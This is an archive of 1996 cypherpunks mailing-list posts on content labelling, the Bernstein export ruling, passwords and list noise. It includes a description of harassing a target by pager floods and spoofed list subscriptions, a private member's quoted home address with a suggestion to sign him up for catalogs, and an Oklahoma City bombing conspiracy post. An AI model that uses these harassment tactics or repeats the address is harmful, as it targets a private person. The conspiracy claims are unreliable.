To: Black Unicorn <tcmay@got.net
Subject: Re[2]: "STOP SENDING ME THIS SHIT"
Message-ID: <9603178297.AA829764813@ccmail.wnyric.org>
MIME-Version: 1.0
Content-Type: text/plain


          I've got news for you all. This 'jerk' was spammed by some
          ass out there. I've canceled by subscription so would you
          all quit whining already. Sorry if I sent you people
          inappropriate mail, but I just wasn't very happy getting
          2000 e-mails a day.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Thu, 18 Apr 1996 03:40:14 +0800
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <199604162053.QAA10650@universe.digex.net>
Message-ID: <199604171526.LAA30813@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
> 
> Steve Reid writes:
> >Really, the apropriate place for content filtering is at the application 
> >layer. It *could* be done at the transport layer, but that's really not 
> >the place for it.
> 
> Izzat so?  So explain to me what the difference between the PICS type
> ratings and security classifications is.

> Clearly the IETF believed that the network layer was an appropriate
> place for general classification when they developed IPv4.  I haven't
> verified it, but I suspect that IPv6 has (or will have) an appropriate
> mechanism for indicating security classification.

That's not at all clear.  The IETF did not sit down in committee and
"develop IPv4" (thank god).  And I've not seen any evidence that it was
designed with support for security labels in mind.

Personally, I agree with Steve that, even though IP *may* be used to
propagate security options, it isn't the "right" place.

One problem with labeling things at the transport level is that this
requires support for the labels throughout the operating system(s) on
which the "content" is generated (at least for a "real" multi-user system
with a potentially mixed adult/child user base) or through which it flows.
The operating system has to carry labels around in conjunction with each
and every process and file on the system in order that the low-level
software will be able to accurately label IP datagrams.  And this OS
support is both difficult to implement and onerous to the users and
applications running on that platform -- otherwise, we'd all be running
on TCSEC B-level operating systems right now.

Fundamentally, the decision boils down to whether you want the labeling
to be mandatory (as with DoD security labels) or voluntary as with PICS.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Apr 1996 07:14:57 +0800
To: cypherpunks@toad.com
Subject: META: Having the last word
Message-ID: <ad9a7e9d02021004dfd9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:58 PM 4/17/96, rick hoselton wrote:

>I am enjoying this discussion, but I feel like I'm running out of
>useful new ways to try to express this idea.  If I don't reply,
>it doesn't mean you have convinced me. :)

I have long used this principle. All discussions have to end at some point,
and I have no problems with others having "the last word." If they think
that by having the last word, or by my non-response to their points, that
they have "won," or that I am speechless before their eloquence, then of
course they were not worth arguing with in the first place. No point in
arguing with the preterite. (My neo-Calvinist stoicism showing.)

Recall the recent absurdity of one of our list members repeatedly saying "I
see that Joe Blow has still not responded to my arguments, so I guess he
has conceded defeat! Hee Hee." The more likely explanation is that his
opponent simply realized what he was dealing with.

--Tim May



THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Apr 1996 03:52:24 +0800
To: Ben Rothke <ben.rothke@citicorp.com>
Subject: Re: Spaces in passwords
In-Reply-To: <199604171502.AA17527@egate.citicorp.com>
Message-ID: <199604171543.LAA05427@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ben Rothke writes:
> Do spaces (ASCII 20) in passwords make them less secure?

Of course not. In a normal Unix password, adding spaces to the
password search space increases the search space, so it necessarily
makes the search harder.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Huang <hwh6k@fulton.seas.virginia.edu>
Date: Thu, 18 Apr 1996 04:14:24 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <199604171546.LAA67558@fulton.seas.Virginia.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 16, 16:22, Steve Reid wrote:
> Security classification and "decent/indecent" ratings are rather
> different, IMHO. With security, the author of the data has to decide the
> best rating for his/her own security. With decent/indecent filtering, the
> author has to decide what is best for _other_people_. I suppose it's not 
> as bad as that with the third-party ratings in PICS, but there will still 
> be inconsistancies.

"As bad"?!?  Actually, it's a good deal worse.  See below.

> The main reason I think decent/indecent filtering should be done at the
> application level is, if they create a ratings system and later decide
> that they've screwed up and another system would be better (which is quite
> possible, if you understand the previous paragraph), all that's really
> required is re-writing the application software. OTOH, if they did it at
> the transport layer and later decided to switch to something else, they
> would have to change the protocol, which is very difficult. And, depending
> on the changes, they may have to re-write the apps again anyways. 
> 
> Also, at the application layer, ANYONE could create their own ratings
> system, and the market could decide which is best. (The downside of that 
> is that there would be nonstandardized chaos for a while).

Well good.  Better nonstandardized chaos than a single, arbitrarily
defined and applied system.  (Ref: "Parental Advisory" stickers, which
were IMHO totally useless, and a doomed concept from the start.)

I think that if there's going to be ratings, better to have lots of
different organizations reflecting different tastes and mores than
one organization reflecting political pressures and prejudices.

(No real crypto relevance in the concept per say, but perhaps in
the application (as Bill pointed out with the PICS excerpt).)

-H




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 18 Apr 1996 04:17:23 +0800
To: cypherpunks@toad.com
Subject: COQ_tal
Message-ID: <199604171546.LAA20232@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-17-96. Fint:

   "When rocket scientists crash out of orbit."

   Barry Riley essays on the impact of physicists and
   mathematicians on finance and economics, while reporting on
   a recent article by three physicists critiquing the
   shortcomings of the Black-Scholes formula for pricing
   options.

      The Bouchaud-Iori-Sornette formula for "real world"
      options attempts to minimise these residual risks,
      especially by applying a more sophisticated mathematical
      treatment to the "tails" of the distribution. If the
      risks cannot be hedged out, at least they can be reduced
      via diversification.

   A bracing cocktail for the recent cpunks bar-slappers on
   funny-money and unscriving and eye-grit quackers.


   COQ_tal









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Thu, 18 Apr 1996 04:18:05 +0800
To: cypherpunks@toad.com
Subject: Re: i want off
In-Reply-To: <199604170041.TAA18169@silver.niia.net>
Message-ID: <Pine.SCO.3.91.960417114234.13968D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Apr 1996, Mathew Ellman wrote:

> can someone help me off this mailing list
> Mathew Ellman
> (DEAL WITH IT)
> 15 N WASHINGTON ST APT 1
> VALPARAISO IN 46383

Smooth move.  You just published your home address to about 1000 people, 
all of whom are suspected of being involved in a nation-wide moon pie 
theft clique.  Expect weirdness.  Ignore the knocks on your door late at 
night.  Do not feed or water the on-going Cypherpunks meeting and party 
that is about to manifest itself in your front yard.  If you do, they'll 
never go away.

Enjoy being in the archives for all time.  Impress your friends by doing 
a WWW search on your name and actually having a hit returned by the 
search engine.

> 
> HAVE A VERY GREAT DAY FROM ME TO YOU.

Well, thanks very much.  You, too.  And remember, DO NOT OPEN THE DOOR 
FOR STRANGERS!

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 18 Apr 1996 08:15:33 +0800
To: cypherpunks@toad.com
Subject: Re: "STOP SENDING ME THIS SHIT"
Message-ID: <199604171857.LAA14761@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This rash of postings reminds me of a technique to harass someone by
telephone.  You note that pager companies are usually assigned a block of
telephone numbers.  So you program your auto-dialer to dial each in turn
and then send your target's number.  Result: your target gets a lot of,
"Why did you page me?" calls.  (My collage roommate had fun in high school
by dialing two "random" numbers on his two line phone and then connecting
them together and listening to the result.)

The analogy here is to spoof mail addresses to subscribe your target to
high-volume mailing lists.  If you want to attack the list as well, even
better.

Can someone be subscribed to cypherpunks and not get the welcome message?


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 18 Apr 1996 03:55:23 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Bernstein case decisision (fwd)
Message-ID: <Pine.SUN.3.91.960417115643.1932M-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


reposted with permission.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)

---------- Forwarded message ----------
Date: Wed, 17 Apr 1996 05:23:47 -0400
>From: Mike Godwin <mnemonic@well.com>
To: Multiple recipients of list <cyberia-l@warthog.cc.wm.edu>
Subject: Re: Bernstein case decisision

[...] 

The following summary is from my colleague Shari Steele:

What Judge Patel said.
First, the judge ruled that Bernstein could bring his case even though the
Arms Export Control Act specifically precludes judicial review, because what
we are asking the judge to review (i.e., the constitutionality of the
statute and its regulations) was not what had been precluded (i.e., the
government's determination in a particular instance whether or not something
was exportable).  "With respect to constitutional questions, the judicial
branch not only possesses the requisite expertise to adjudicate these
issues, it is also the best and final interpreter of them."

Next, the judge determined that only the source code was at issue here, not
Bernstein's academic paper describing the source code.  Bernstein tried to
get the government to rule separately on the paper and the code back in 1993
by filing separate CJ requests.  The State Department merged the requests
and rejected them all.  On June 29, 1995, after we filed this suit, the
government sent Dan a letter saying that the paper could be published and
never had been forbidden.  While Judge Patel claimed that the issue of the
paper now appeared to be moot, she commented, "It is disquieting than an
item defendants now contend could not be subject to regulation was
apparently categorized as a defense article and subject to licensing for
nearly two years, and was only reclassified after plaintiff initiated this
action."

Finally, the key ruling in the case.  "This court can find no meaningful
difference between computer language, particularly high-level languages as
defined above, and German or French....Like music and mathematical
equations, computer language is just that, language, and it communicates
information either to a computer or to those who can read it....Thus, even
if Snuffle source code, which is easily compiled into object code for the
computer to read and easily used for encryption, is essentially functional,
that does not remove it from the realm of speech....For the purposes of
First Amendment analysis, this court finds that source code is speech."
This is the first time that we know of that a court has ruled that source
code is speech for First Amendment analysis.  This is a Big Deal - a very
important precedent.  The judge drew an analogy to copyright law, which
treats computer software as a "literary work" and offers it copyright
protection, to help her come to her conclusion.

The judge, therefore, did not throw out any of our claims (the ITAR acts as
a prior restraint on speech, the ITAR is overbroad, and the ITAR is vague).
She looked at each of them one by one and determined that each of them had
merit.

What this decision means.
Most directly, it means that we can continue on with our lawsuit.  The
government had brought a motion to dismiss the case, contending that the
court lacked jurisdiction to hear this matter because it was a matter of
national security.  The judge struck that down and said that we can go
forward with our suit.

More indirectly, the judge's ruling sets the stage for us winning at trial.
She clearly "gets it," and isn't intimidated by the government's use of
precedential cases that aren't on point.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 18 Apr 1996 09:06:36 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <ad9a78940002100474f5@[205.199.118.202]>
Message-ID: <199604171914.MAA14893@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > These stickers on CDs were actually very useful. Kids could
 > spot more quickly the juicy stuff. The taste of forbidden
 > fruit is so much better.

 > Likewise, the "age bit" that some are talking about will be
 > similarly useful. Minors will be unambiguously
 > identified--no more "is she or isn't she?"--and actions
 > taken accordingly.

This is just another great example of the Law of Unintended
Consequences.

One of the nice things about the Internet is that kids can
explore all sorts of subjects in the safety of their living room,
providing they follow a few simple rules about not giving out
personal information like their age, name, address, and phone
number, and don't arrange meetings or use information they obtain
without checking first with a well-clued caregiver.

An "age bit" definitely qualifies as the disclosure of "personal
information" about the user.

 > (Several years from now, I see a great hue and cry over the
 > fact that the "age bit" mandated by "The Children's Internet
 > Protection Act of 1997" will be used to deny the protection
 > of adult-seeming personnas to children. Pedophiles and the
 > like will find their tasks easier, and the Act's supporters
 > will say "But that's not what we intended!!")

I think the "age bit" will solve a lot of problems we have now
with 50 year old wankers posing as 12 year olds on pedo IRC
channels. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 18 Apr 1996 06:08:12 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein case decisision (fwd)
Message-ID: <199604171634.MAA26903@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks much , Michael.


Shows what a scary cpunk-packed courtroom can do to tip the 
scales of blind justice.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 18 Apr 1996 08:51:04 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: CDA Court Challenge: Update #7 (Ducks on the Net)
In-Reply-To: <OJRdx8m9L0KT085yn@netcom.com>
Message-ID: <Pine.SOL.3.91.960417123757.3025D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Apr 1996, Alan Bostick wrote:
> Simon Spero <ses@tipper.oit.unc.edu> wrote:
> 
> > Dash it Declan, I spent a hard day up to my eyeballs in ASN.1. When I 
> > get home I want something cute to look at. Where are the darn  ducks?
> > 
> ME T00!!!!1!
> PUT ME ON THE L1ST111!1

> SUBSCRIVE

You need to send a message to majordomo@tree-frog.com with the body
subscrive cypherducks 

(tree-frogs are much cuter than toads)

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 18 Apr 1996 04:56:55 +0800
To: m5@vail.tivoli.com
Subject: Re: Clinton blathering about Internet terror
Message-ID: <01I3ND8BMOQ88Y53TS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"m5@vail.tivoli.com"  "Mike McNally" 17-APR-1996 11:19:57.56

>Subject: Clinton blathering about Internet terror

>See http://www.yahoo.com/headlines/960417/news/stories/internet_1.html.

	Also at http://www.nando.net/newsroom/ntn/info/041796/info11_8930.html.
The listing of sites outside of the US might encourage people to realize that
this information can't be stopped.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 18 Apr 1996 06:08:37 +0800
To: cypherpunks@toad.com
Subject: Re: why compression doesn't perfectly even out entropy
Message-ID: <960417131542_274184240@mail04>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-16 15:51:46 EDT, Perry Metzger writes:

>There is no reason you can't have a string of 20 1 bits in
>a row in a perfectly random sequence, for example. Usually, random
>sequences are non-compressable, but it is possible (though very
>improbable) for Hamlet to appear out of a random number generator,
>and it is of course quite compressable...

Of course, if that happened, the odds of it happening from a Trojan Horse or
other type of attack are overwhelming...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 18 Apr 1996 06:10:25 +0800
To: cypherpunks@toad.com
Subject: Re: No Subject
Message-ID: <960417131551_274184307@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-17 02:35:51 EDT, you write:

>Knowledge about TCP/IP is alot easier to control than knowledge about the
>Berlin Wall (ie, how many Chinese will even know of the existence of TCP/IP
>-- in the US, where this is freely available, how many citizens know of it's
>existence)?

I bet this would change if people saw knowledge of TCP/IP as the "key to the
Berlin Wall."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Toasto <ddt@lsd.com>
Date: Thu, 18 Apr 1996 10:55:05 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Toast Fishing in America
Message-ID: <v03006320ad9b009da98c@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


[from "If _____ Made Toasters" ...my edits]

    If The Rand Corporation made toasters...
      They would be large, perfectly smooth, seamless black cubes.
      Each morning, exactly as much toast as you could eat would
      appear on top of your toaster. Their service department would
      have an unlisted phone number and the cube's blueprints would
      be highly-classified government documents, but the "X-Files"
      would have an episode with a partially disassembled toaster
      remarkably similar to it visible in the background.

    If the NSA made toasters...
      Your toaster would have a secret crumb-door on the back that
      only the NSA could open in case they needed to inspect your
      toast for breakfasts of a national security nature.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Apr 1996 10:24:23 +0800
To: Michael Froomkin <cypherpunks@toad.com>
Subject: Re: Bernstein case decisision (fwd)
Message-ID: <m0u9eAs-00092WC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM 4/17/96 -0400, Michael Froomkin wrote:
>reposted with permission.
>
>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>---------- Forwarded message ----------
>Date: Wed, 17 Apr 1996 05:23:47 -0400
>>From: Mike Godwin <mnemonic@well.com>
>The following summary is from my colleague Shari Steele:
>
>What Judge Patel said.
>First, the judge ruled that Bernstein could bring his case even though the
>Arms Export Control Act specifically precludes judicial review, because what
>we are asking the judge to review (i.e., the constitutionality of the
>statute and its regulations) was not what had been precluded (i.e., the
>government's determination in a particular instance whether or not something
>was exportable).  "With respect to constitutional questions, the judicial
>branch not only possesses the requisite expertise to adjudicate these
>issues, it is also the best and final interpreter of them."
[stuff deleted]
>The judge, therefore, did not throw out any of our claims (the ITAR acts as
>a prior restraint on speech, the ITAR is overbroad, and the ITAR is vague).
>She looked at each of them one by one and determined that each of them had
>merit.
>
>What this decision means.
>Most directly, it means that we can continue on with our lawsuit.  The
>government had brought a motion to dismiss the case, contending that the
>court lacked jurisdiction to hear this matter because it was a matter of
>national security.  The judge struck that down and said that we can go
>forward with our suit.
>
>More indirectly, the judge's ruling sets the stage for us winning at trial.
>She clearly "gets it," and isn't intimidated by the government's use of
>precedential cases that aren't on point.

It looks like this judge is well on her way to throwing out the 
portion of ITAR which deals with software of all kinds, not merely digitized 
source code originally from books.  That's progress, of a sort.

I'm still waiting to see what that "Burns bill" will be all about.  Since 
that bill is supposed to deal directly with the issues this judge has 
already shown sense on, I think that this bill ought to be no less generous 
with computer software exports than an anticipated court decision WRT ITAR 
will be.   

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ssalgaller@CCGATE.HAC.COM
Date: Thu, 18 Apr 1996 10:53:09 +0800
To: lpease@netcom.com
Subject: Oklahoma City - One Year Later - The Coverup Continues !
Message-ID: <9603178297.AA829776269@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     Suggested Reading:
     
     Oklahoma City - The Suppressed Truth 
     By Jon Rappoport
     Blue Ocean Press
     2633 Lincoln Blvd., Suite #256
     Santa Monica, CA 90405
     (213) 243-9005
     copyright 1995
     $12 (post paid)
     
     At 9:02 AM on April 19, 1995, the Murrah Federal Building in Oklahoma 
     City
     was damaged in an explosion that also left 168 dead and 600 injured. 
     If you
     look closer at this case, as investigative reporter Jon Rappoport has, 
     you
     start asking some questions about the "official' story:
     
     The damage was supposedly caused when thousands of pounds of a fuel 
     oil and
     fertilizer mixture was ignited in a truck parked near the building. 
     Talk
     about "oil and water never mixing". This mixture would have to be 
     either
     stirred or mixed just before use. It would also have to be detonated 
     without
     any air spaces, such as the gaps between the fuel drums, in order to 
     work.
     
     Even if the mixture detonated, it should leave traces of oil. none was 
     found.
     
     Even if it detonated perfectly, the explosion was 3 times too weak to 
     damage
     the building's reinforced concrete support columns.
     
     Especially column "B3". This column was sheared off at the 3rd floor 
     level.
     Only a shaped charge placed directly on the column at that level would 
     be
     able to cause this to happen. That section of the column was cut out 
     and
     removed as evidence. Will we ever see it again at the trial ?
     
     Local seismometers noted *two* explosions, 10 seconds apart. This was 
     "explained away" as reflections of the explosion by underlying rock 
     strata.
     Ask a geologist if this sort of time delay has ever been observed 
     before you
     decide if someone is "underlying".
     
     What ever happened to "John Doe #2", seen with Tim Mc Veigh that 
     morning ?
     
     What happened to John Doe's #3 and #4, seen leaving the area soon 
     after the
     explosion?
     
     Speaking of Tim, why (if the official story is true) did he advise the 
     officer who stopped him that he had a concealed weapon ? Supposedly, 
     he just
     killed 168 people, including 19 children. What's one more if it means 
     he
     could get away ?
     
     And what about Terry Nichols ?
     He was advocating killing Federal employees at a public meeting in 
     Estes, CO
     a year before the bombing. The FBI is very efficient, yet no one seems 
     to
     have paid any attention to Terry to prevent loss of life.
     
     What about the reported financial links to the bombing, not from right 
     wing
     causes, but from the Brittish Government ?
     
     Finally, what happens if and when the truth comes out in open court at 
     Tim
     and Terry's trial ? One could guess that the real suppressed story 
     will be
     one more casualty of the bombing.
     
     Unless we demand that someone explains column "B3".
     
     It *can* happen here - and it *did* a year ago !
     
     Book "review" by
     Stephen S.
     salgaller@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 18 Apr 1996 10:37:31 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Re[2]: "STOP SENDING ME THIS SHIT"
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960417212313Z-12717@red-06-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Perry E. Metzger
>
>Remedial english composition courses are available at virtually all
>community colleges, and are a great help in making yourself understood
>in writing.
.......................................................................


Suvcrivers, Look Out -  Perry is on a roll!!!



(as he smiles quietly to himself.........)


    ..
Blanc

>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com (Jamie Lawrence)
Date: Thu, 18 Apr 1996 14:29:50 +0800
To: John Young <cypherpunks@toad.com
Subject: COQ_tal
Message-ID: <v02140b02ad9b10a39d5c@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain




--
Jamie                                          foodie@netcom.com
________________________________________________________________
Our cat is a dog.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 18 Apr 1996 11:18:42 +0800
To: cypherpunks@toad.com
Subject: EFF/Bernstein Press Release
Message-ID: <199604172154.OAA06645@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


	FEDERAL COURT DENIES GOVERNMENT'S MOTION TO DISMISS BERNSTEIN CASE, 
	            ACKNOWLEDGES SOURCE CODE AS SPEECH

April 17, 1996
				Electronic Frontier Foundation Contacts: 
				Shari Steele, Staff Counsel
				301/375-8856, ssteele@eff.org 
				Lori Fena, Executive Director
				415/436-9333, lori@eff.org

Denying the government's motion for dismissal in mathematician Daniel 
Bernstein's suit against the State Department, Judge Marilyn Patel in the 
Northern District of California ruled Monday that source code in 
Bernstein's cryptographic algorithm, "Snuffle," is speech that is 
protected from prior restraint by the First Amendment.

LANDMARK RULING
This is the first time a U.S. court has ruled that source code is speech 
under First Amendment analysis. Previously, courts have held that 
software is speech for copyright law only.

The decision states in part: 
"This court can find no meaningful difference between computer language, 
particularly high-level languages as defined above, and German or 
French....Like music and mathematical equations, computer language is 
just that, language, and it communicates information either to a computer 
or to those who can read it....Thus, even if Snuffle source code, which 
is easily compiled into object code for the computer to read and easily 
used for encryption, is essentially functional, that does not remove it 
from the realm of speech....For the purposes of First Amendment analysis, 
this court finds that source code is speech."

(The full text of the decision can be found at 
http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS/Legal/Decision_041596/)

Judge Patel's acknowledgment that source code enjoys Constitutional 
protection has implications that reach far beyond cases involving the 
export of cryptography. The decision holds importance to the future of 
secure electronic commerce and lays the groundwork needed to expand First 
Amendment protection to electronic communication.

Because of its far-reaching implications, the Bernstein case is being 
watched closely not only by privacy advocates, but by the entire computer 
industry, the export and cryptography communities and First Amendment 
advocates.

CASE WILL PROCEED
The decision allows Bernstein to continue with his lawsuit that the 
International Traffic in Arms Regulation (ITAR) acts as a prior restraint 
on speech and that the ITAR is overbroad and vague. 

EFF is very pleased with Judge Patel's ruling and believes that it bodes 
well for Bernstein's ultimate success in trial, which is now scheduled to 
proceed with the normal pre-trial and trial sequence of events.

The court drew an important distinction between the Bernstein case and 
other cases involving export controls on cryptography. The government has 
cited several cases involving the Export Administration Act as reasons 
why the Bernstein case should be dismissed. Judge Patel recognized that 
the Constitutional questions being raised by Bernstein differ 
significantly from the policy questions raised in the cases introduced by 
the government.


Judge Patel also ruled that Bernstein could bring his case even though 
the Arms Export Control Act specifically precludes judicial review, 
because what Bernstein is asking the court to review (i.e., the 
constitutionality of the statute and its regulations) was not what had 
been precluded (i.e., the government's determination in a particular 
instance whether or not something was exportable).  "With respect to 
constitutional questions, the judicial branch not only possesses the 
requisite expertise to adjudicate these issues, it is also the best and 
final interpreter of them."

CASE BACKGROUND
As part of her decision, Judge Patel determined that only the source code 
was at issue in the case, not Bernstein's academic paper describing the 
source code.  Bernstein tried to get the government to rule separately on 
the paper and the code back in 1993 by filing separate commodity 
jurisdiction requests.  The State Department merged the requests and 
rejected them all.  On June 29, 1995, after Bernstein and EFF filed suit, 
the government sent Bernstein a letter saying that the paper could be 
published and never had been forbidden.  While Judge Patel claimed that 
the issue of the paper now appeared to be moot, she commented, "It is 
disquieting than an item defendants now contend could not be subject to 
regulation was apparently categorized as a defense article and subject to 
licensing for nearly two years, and was only reclassified after plaintiff 
initiated this action."

THE ELECTRONIC FRONTIER FOUNDATION
EFF, a non-profit civil liberties organization working in the public 
interest to protect privacy, free expression, and access to online 
resources and information, is a primary sponsor of the Bernstein case. 
EFF helped to find Bernstein pro bono legal counsel, is a member of the 
Bernstein legal team, and organized amicus briefs from members of the 
academic community and computer industry to support this case.
				###




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 18 Apr 1996 10:16:29 +0800
To: cypherpunks@toad.com
Subject: Re: i want off
Message-ID: <9604172011.AA11295@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > can someone help me off this mailing list
> > Mathew Ellman
> > (DEAL WITH IT)
> > 15 N WASHINGTON ST APT 1
> > VALPARAISO IN 46383
> 
> Smooth move.  You just published your home address to about 1000 people, 
> all of whom are suspected of being involved in a nation-wide moon pie 
> theft clique.  Expect weirdness.  Ignore the knocks on your door late at 
> night.  Do not feed or water the on-going Cypherpunks meeting and party 
> that is about to manifest itself in your front yard.  If you do, they'll 
> never go away.
> 
> [...]

Check out http://catalog.savvy.com/ for added juvenile fun with this
person. 

;-)

Dan
 
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@gti.net>
Date: Thu, 18 Apr 1996 08:37:27 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Fascist takes another bite
In-Reply-To: <199604171436.HAA24624@jobe.shell.portal.com>
Message-ID: <199604171914.PAA11223@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be anonymous-remailer@shell.portal.com wrote:
: 
: Information on how to construct a similar bomb is available to anyone
: around the world with Internet access.

... or US Gov't training manuals or _Still Life With Woodpecker_ by
Tom Robbins.


:      
: The sect is also believed to have been looking to procure samples of the
: lethal ebola virus.

Context-type: virus/lethal ???


:      
: About 5,000 other commuters where taken ill in the incident.
:      Clinton also told the news conference that in the next 20 years "every
: great nation will have to face" the question of terrorist access to the
: Internet.

http://www.batf.gov/ anyone?

- -- 
  Mark Rogaski    | Why read when you can just sit and |      Member
  System Admin    |         stare at things?           | Programmers Local
  GTI GlobalNet   | Any expressed opinions are my own  |     # 0xfffe
wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMXVC+w0HmAyu61cJAQGPDQP9Euet3ZGT//9BILD0X7ZuUIYD3fraZ/Qr
LSVxcBC8fnfatMxU6Xg3I6obv4cpA55lK9R/LURoi32X+rbN3hZKawTWi15tk9dX
K8O7v9++d21bM0736HW8k0SEBCmqqtlGwP/dP5B1R65DPo2bL23e17bitFlPhIUK
gTmAKTcz2TQ=
=Mvdb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lisa Pease <lpease@netcom.com>
Date: Thu, 18 Apr 1996 11:44:34 +0800
To: ssalgaller@CCGATE.HAC.COM
Subject: Re: Oklahoma City - One Year Later - The Coverup Continues !
In-Reply-To: <9603178297.AA829776269@CCGATE.HAC.COM>
